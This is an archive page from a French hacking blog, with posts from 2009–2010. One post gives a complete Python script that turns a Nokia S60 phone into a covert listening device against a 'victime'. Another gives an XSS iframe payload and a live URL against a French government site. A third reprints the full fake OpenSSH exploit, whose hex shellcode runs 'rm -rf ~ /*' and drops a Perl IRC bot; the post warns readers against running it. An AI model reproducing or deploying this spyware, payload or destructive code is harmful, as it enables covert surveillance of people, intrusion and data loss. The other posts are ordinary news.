HackBBS
Divers « HackBBS

Archive for the ‘Divers’ Category

« Older Entries

Transformer un Nokia S60 en téléphone espion

Wednesday, September 1st, 2010

Voici un script python pour transformer en téléphone espion les nokia qui seront compatible (S60). Le principe est interessant, et ce script vous sera peut être utile pour vous lancer dans ce type de développement ^^

Une fois installé, ce script répond à un appel et enregistre le bruit ambiant sans intervention de la victime.

import appuifw

import e32
import logs
import audio
import telephone
from e32db import format_time
from time import *

def recording():
try:
global S
formatted_time = format_time(time()).replace(’:',”).replace(’/',”).replace(’ ‘,”)
filename = u’e:\\kuku_recording_’ + formatted_time + ‘.wav’
S=audio.Sound.open(filename)
S.record()
print u’Recording ‘ + filename
except:
print ‘Error.’

def handleCall((callState, number)):
#callerNum = c.get()
global callerOK
global caller

if callState == telephone.EStatusRinging :
if number == caller :
print u’Caller (’ + number + ‘) recognized, waiting for hanging up…’
callerOK = 1
else :
print u’(’ + number + ‘) unknown caller.’
callerOK = 0
elif callState == telephone.EStatusDisconnecting :
print u’Disconnecting…’
if callerOK == 1 :
recording()

def closing():
try:
global S
S.stop()
S.close()
print u’Stopped.’
except:
print u’Nothing to stop.’

def quit():
script_lock.signal()
# appuifw.app.set_exit()

appuifw.app.exit_key_handler = quit
appuifw.app.menu = [(u"Stop", closing)]
appuifw.app.title = u’KuKu!’
#c = appuifw.Text()
#appuifw.app.body = c

print u’KuKu! - (c) J@mBeL.net’
global caller
caller = appuifw.query(u’Enter phone number: ‘, ‘text’)
telephone.call_state(handleCall)

script_lock = e32.Ao_lock()
script_lock.wait()

Pour information, jambelnet à réalisé un mini howto expliquant comment transformer vos scripts python en application pour symbian OS (cf http://jambelnet.blogspot.com/search/label/Mobile)

Plus d’informations à cette adresse: http://jambelnet.blogspot.com/2008/06/spy-phone-python-script-for-s60.html

Tags: , , , , ,
Posted in Divers, Réseau | No Comments »

XSS sur les sites gouvernementaux, assemblee-nationale.fr et performance-publique.gouv.fr

Friday, August 27th, 2010

Paul Rascagneres, alias RootBSD, a découvert un bien drôle de bug sur le site de l’Assemblée Nationale. Dans les recherches, il est possible d’y intégrer du code et d’y afficher par conséquent des choses assez amusantes. Paul a pris pour exemple d’intégrer une vidéo YouTube anti-Hadopi dans les résultats via le code suivant :

<iframe width=100% height=400px src=http://www.youtube.com/v/3J66hf0M6rk&fs=1&autoplay=1></iframe><br>Surprise : ff54a345b746a6a2b84c9bcbf563ee3d<br>

Assemblee Nationale faille

Il est cependant tout à fait possible d’afficher une autre vidéo en changeant l’url. Ce qui n’a rien de grave en soi, puisque cela ne concerne que l’auteur de la recherche finalement.

Mais il est peut-être aussi possible d’intégrer un code différent et donc afficher un autre type de contenu. Et pourquoi pas créer quelques problèmes au site… Il faut espérer que non.

[[Source PcImpact & RootBSD]]

En suivant cet exemple il s’est avéré qu’un autre site gouvernemental était lui aussi vulnérable. Il s’agit de performance-publique.gouv.fr.

Nous avons donc repris la preuve de concept de RootBSD pour illustrer cet exemple:

http://tinyurl.com/23a4kuy

http://www.performance-publique.gouv.fr/index.php?rechercheRapide=%3Ciframe+width%3D100%25+height%3D400px+src%3Dhttp%3A%2F%2Fwww.youtube.com%2Fv%2F3J66hf0M6rk%26fs%3D1%26autoplay%3D1%3E%3C%2Fiframe%3E&id=982

Posted in Divers, Nouvelles du net | 1 Comment »

France Wireless : wifi et liberté

Friday, February 5th, 2010

France Wireless : wifi et liberté.

Tags: , , ,
Posted in Culture, Divers | No Comments »

26C3: our darknet and its bright spots

Tuesday, January 19th, 2010

our darknet and its bright spots

building connections for spaces and people

Building a private network to connect your neighbourhood. Why we feel common solutions are terrible on resources and what we think is better.

Get on board.

This talk will give you the opportunity to take a look at the shades of grey of interconnecting hackerspaces and people’s networks. Mc.Fly presents ChaosVPN, reborn in its darknet-ish approach and gaining momentum from established hackerspaces in the US and Europe with spaces like NYC Resistor, Pumping Station: One, Noisebridge and c-base. The Agora Network will be presented by Aestetix and Eric in covering the community and technical aspects and what to expect. Equinox will show you the white-ish side called dn42 - the old but nice lady that connects mostly german people and younger spaces like sublab and entropia.

Leveraging the efforts of the ChaosVPN network in the US is the Agora Network (Currently In Private Beta). By doing this we are not having to duplicate the efforts of every one involved we have settled on a standard platform utilising tincd. With hackerspaces popping up very rapidly and successfully in the US for the last 24 months we find this necessary. Agora is a mesh vpn service that serves to tie them all together on a common intranet. On the network people will be hosting machines for VMs, development, file hosting, PBX phone services, and a number of high performance clusters at the disposal of users which we are currently developing including those provided by node users. In the process several universities in the US have asked to join the network for several research opportunities not previously available to them.

dn42 is built with tunnels (OpenVPN, GRE, tinc, etc) and has BGP running over them - the same dynamic routing protocol the internet runs on, albeit with less networks in the routing table. We will shed some light on both the technical and social aspects of dn42. Our walk starts at technical foundations and heads over to what BGP allows us to do on a social level. We’ll also see how the flow of traffic can be engineered according to external constraints (think your plain asymmetric DSL at home), and last but not least we’ll discuss different cases of maliciousness and how they’re treated. While dn42 is our playground for testing and modelling all this stuff, most of it apples to the internet as well.

This talk is somewhere around entry to immediate level. You should roughly know what an IP subnet, a route and dynamic routing is.

Attached files

* (application/pdf - 731.4 KB)

Links

* Torrent of the video recording for this event in MPEG-4

* Video recording for this event in MPEG-4

* dn42

via 26C3: our darknet and its bright spots.

Posted in Culture, Divers, Nouvelles du net | No Comments »

Berlusconi censure les WebTv - Débats politiques sur LePost.fr

Monday, January 18th, 2010

Un avant goût de ce qui nous attend en France avec la future loi Loppsi, Berlusconi a fait passer dans la loi l’obligation d’une autorisation préalable pour diffuser de la vidéo sur le web, comme pour une chaîne de télévision hertzienne…avec un gros mensonge à la clé pour justifier son geste…la mise en application dans le droit italien d’une directive européenne…si çà c’est pas de la censure…

La vidéo en ligne en Italie, c’est fini. Désormais, il fau­dra obte­nir une auto­ri­sa­tion préa­lable, sous forme de licence, auprès du minis­tère des com­mu­ni­ca­tions Italien.

L’opposition locale a eu beau s’opposer de toutes ses forces, le gou­ver­ne­ment de Berlusconi, connu pour son inté­grité et son res­pect du droit, s’est contenté de dire qu’il ne fai­sait qu’appliquer une direc­tive euro­péenne sur le pla­ce­ment de pro­duit. On ima­gine la tête de Margot Wallström, la com­mis­saire Européenne chargé de la com­mu­ni­ca­tion, égale­ment vice pré­si­dente de la Commission Européenne, d’origine Suédoise, connue pour avoir une toute autre vision de la liberté d’expression.

La simi­la­rité des situa­tions média­tiques Française et Italienne laisse pré­sa­ger qu’une telle loi arri­vera tôt ou tard en France, pro­ba­ble­ment, comme cela a déjà été évoqué par de nom­breux poli­ti­ciens, par le biais d’un contrôle du CSA sur la vidéo sur internet.

via Berlusconi censure les WebTv - Débats politiques sur LePost.fr.

Posted in Culture, Divers, Nouvelles du net | 1 Comment »

The Big Bang - Hack someone…or something - Anti-sec versus SSH …

Friday, December 4th, 2009

The Big Bang - Hack someone…or something - Anti-sec versus SSH ….

En effet, une semaine dèjà, que cour la rumeur sur une éventuelle faille touchant SSH.

En réalité, Eric Romang, co-fondateur du site zataz, avait deja en Juin dernier mis en avant le fait d’une augmentation massive des scan SSH et de brutes forces. [Ici].
Un moi plus tard, un groupe de hacker nommé Anti-Sec, à annoncé un 0day touchant SSH. En effet, la société d’hébergement OVH a envoyé a tous ces clients un courrier electronique
d’information concernant cette éventuelle alerte. [Message d'OVH ici].

Voici les résultats montré par les logs de serveurs attaqué : ICI

Cette article pertinent concernant l’attaque, montre qu’un FAKE Sploit est de sortie … des petits plaisantins se sont amusé a réaliser un fakecode qui une fois compilé et lancé,
efface des éléments systèmes de la machine.

Oui mais voilà, Anti-Sec tape, et tape même fort. Ils auraient utilisé ce 0day a des fins d’hacktivisme… c’est le site imageshack qui s’est vue remplacé toutes ces images
par un message type image:

imageshack owned

Un coup dur pour ce site d’hébergement d’image reconnu internationnalement. Voici d’ailleur leur première déclaration … [ICI].

C’est donc leur IDS qui a permis de corriger la faille rapidement. (Vrai…pas vrai ?)

Bref, une autre victime de cette attaque particulièrement efficace… voici d’ailleur d’autres logs très interessant sur l’attaque: [ICI].

Mais des hackers en cache d’autres… un FAKE de ce 0day circule actuellement sur des sites underground, et des cannaux IRC du même type,
le voici en intégrale, mais avant de vous lancer dans la compilation et l’éxécution de ce faux sploit, vous devez savoir que le shellcode une fois traduis donne ceci:

rm -rf ~ /* 2> /dev/null &

Autrement dit, vous n’avez plus qu’a formater ^^


/* 0pen0wn.c by anti-sec group
 * ---------------------------
 * OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
 *
 *
 * Takes advantage of an off-by-one
 * bug in mapped authentication space on system
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include 

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

char shellcode[] =
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";

char fbsd_shellcode[] =
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
        "\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
        "\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
        printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");
        printf("  Usage: %s -h  -p port\n",arg);
        printf("  Options:\n");
        printf("  \t-h ip/host of target\n");
        printf("  \t-p port\n");
        printf("  \t-d username\n");
        printf("  \t-B memory_limit 8/16/64\n\n\n");
}

#define FD 0x080518fc
#define BD 0x08082000

int main(int argc, char **argv){
    FILE *jmpinst;
    char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
    int port=23, limit=8, target=0, sock;
    struct hostent *host;
    struct sockaddr_in addr;

    if (geteuid()) {
    puts("need root for raw socket, etc...");
    return 1;
    }

    if(argc < 3){
        usage(argv[0]);
        return 1;
    }

    printf("\n  [+] 0wn0wn - by anti-sec group\n");

       if (!inet_aton(h, &addr.sin_addr)){
        host = gethostbyname(h);
        if (!host){
            printf("  [-] Resolving failed\n");
            return 1;
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
    }

    sock = socket(PF_INET, SOCK_STREAM, 0);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
        printf("  [-] Connecting failed\n");
        return 1;
    }
    payload = malloc(limit * 10000);
    ptr = payload+8;
    memcpy(ptr,jmpcode,strlen(jmpcode));
    jmpinst=fopen(shellcode+793,"w+");
    if(jmpinst){
        fseek(jmpinst,0,SEEK_SET);
        fprintf(jmpinst,"%s",shellcode);
        fclose(jmpinst);
    }
    ptr += strlen(jmpcode);
    if(target != 5 && target != 6){
        memcpy(ptr,shellcode,strlen(shellcode));
        ptr += strlen(shellcode);
        memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
    }
    else{
        memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
        ptr += strlen(fbsd_shellcode);
        memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
    }
    send(sock,buffer,strlen(buffer),0);
    send(sock,ptr,3750,0);
    close(sock);
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1) {
        printf("  [-] connecting failed\n");
    }

    payload[sizeof(payload)-1] = '\0';
    payload[sizeof(payload)-2] = '\0';
    send(sock,buffer,strlen(buffer),0);
    send(sock,payload,strlen(payload),0);
    close(sock);
    free(payload);
    addr.sin_port = htons(6666);
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0) {
                   /* v--- our cool bar that says: "r0000000t!!!" */
        printf("\n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");
        fremote("PS1='sh-3.2#' /bin/sh");
    }
    else
        printf("  [-] failed to exploit target :-(\n");
    close(sock);
    return 0;
}


N’éxécutez donc surtout pas ce code … !! (Posté ici a but informatif, ne vous faites pas avoir … !)

Pour revenir au sujet, voilà que la team Anti-Sec semble une fois de plus avoir frappé. Après le moteur de crack Astalavista.box.sk, SSANZ et imageshack,
c’est au tour du site blackHat Forums de payé les pots cassés.
A l’heure ou j’écris cet article, l’accès au site ne mène qu’au visionnage d’une video particulièrement choquante (Scato…).

Posted in Culture, Divers, Nouvelles du net, Programmation, Réseau, Systèmes, Tutoriaux | No Comments »

Asus condamné pour une vente forcée de Windows- Ecrans

Thursday, December 3rd, 2009

Asus condamné pour une vente forcée de Windows

par Manuel Raynaud

tags : logiciel libre , justice , économie

CC Mr Conguito

Eric Magnien est doublement soulagé. Le tribunal de Lorient vient de lui donner une seconde fois raison dans le différend qui l’opposait à Asus. Le 27 mai 2008, il s’était offert un ordinateur portable mais, comme la loi le prévoit, ne souhaitait pas conserver Windows Vista vendu avec. Il préfère utiliser des logiciels libres.

Problème : quand il allume l’ordinateur, il lui est impossible de ne pas passer par la case « installation de Vista » et donc le contrat de licence Windows y afférant. C’en est trop : il prend contact avec Asus qui lui propose de faire le vide du disque dur mais « aux frais du client ». Autrement dit, c’est à lui de payer le transport. Le constructeur lui promet également un chèque de remboursement de 40 euros en échange du logiciel Vista.

Ces conditions ne lui conviennent pas. Il se rend devant le tribunal de proximité de Lorient qui lui donne raison une première fois le 27 août. Asus y est condamné à lui verser 205€ ainsi que 500€ pour les frais de justice. « Il ne peut être sérieusement contesté que les modalités de la vente liée mise en place par la société ASUS ont pour effet de contraindre de manière quasi directe le consommateur de conserver le système d’exploitation Windows de Microsoft », note alors le jugement.

Puis, une seconde fois le 12 novembre après qu’Asus ait fait appel du premier jugement. Et cette fois-ci, la condamnation est même un peu plus forte : 400€ à titre de dommages et intérêts et 250€ pour les frais engagés. Cette somme s’ajoute à la première condamnation. Au total, Eric Magnien a reçu un chèque de 1405,90€ comme le montre l’Association Francophone des Utilisateurs de Logiciels Libres (AFUL). Ironique puisqu’à l’origine, il n’en demandait pas tant, seulement 205€ soit l’équivalent des prix cumulés de Windows Vista Home Premium, d’Office One et de Nero 7.

Pour l’AFUL, qui milite contre ce système de ventes liées, cette somme résulte « de l’entêtement totalement déraisonnable du constructeur » et, renforcée par ce jugement, « appelle à la multiplication des demandes de remboursement auprès des constructeurs de la part de ceux qui n’ont pas besoin des licences imposées, notamment de la part des étudiants et enseignants qui bénéficient déjà de licences, gratuites ou non, pour ces mêmes logiciels ou pour d’autres ».

via Asus condamné pour une vente forcée de Windows- Ecrans.

Posted in Culture, Divers, Nouvelles du net | No Comments »

Slowloris HTTP DoS

Wednesday, June 24th, 2009

Slowloris permet de réaliser des attaques par Déni de Service via des requêtes HTTP partielles permettant d’exploiter une faille de conception dans l’implémentation du protocole HTTP de nombreux serveurs Web donc les branches 1.x et 2.x d’Apache

Slowloris HTTP DoS.

Posted in Divers | No Comments »

Sujet du message: DevBBS ouvre ses portes aux membres de Hackbbs

Thursday, April 2nd, 2009

Chéres membres,
Depuis quelques jours, moi, Korigan, Sliim, Tortukitu, Wasp et d’autres membres contribuons a créé une petite soeur à HackBBs : DevBBs !
Je tiens tout d”abord à tous vous remercier pour votre soutient et votre aide pour la construction de ce forum. Tout particulièrement Korigan grâce à qui on a pu héberger ce projet et obtenir un précieux soutient

Ceci étant dit, j’ai donc l’honneur de vous annoncer que DevBBs ouvre officiellement ses portes aux membres et que vous êtes les bienvenus sur ce nouveau forum !

DevBBs aura pour but d’aborder en détail les sujets qui concernent la programmation (apprentissage, questions, news, …) et le développement de logiciel dans de nombreux langages.
Mais à la places de long discourt… découvrez plutôt par vous même le contenu de DevBBs :
Inscription
(il suffit de donner son nom d’utilisateur, son mot de passe et son adresse mail)

Inform@tiquement
Manu404, la HackBBs Team et la DevBBs Team

Posted in Divers | No Comments »

Aux urnes e-citoyens, formez vos listes…

Thursday, April 2nd, 2009

